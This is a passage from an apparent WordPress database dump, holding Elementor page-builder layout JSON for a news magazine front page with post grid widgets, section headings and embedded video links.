con_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1398,486,'_elementor_version','0.4'),(1399,486,'_elementor_css','a:3:{s:4:\"time\";i:1508918999;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1400,487,'_elementor_edit_mode','builder'),(1401,487,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1402,487,'_elementor_version','0.4'),(1404,488,'_elementor_edit_mode','builder'),(1405,488,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_ico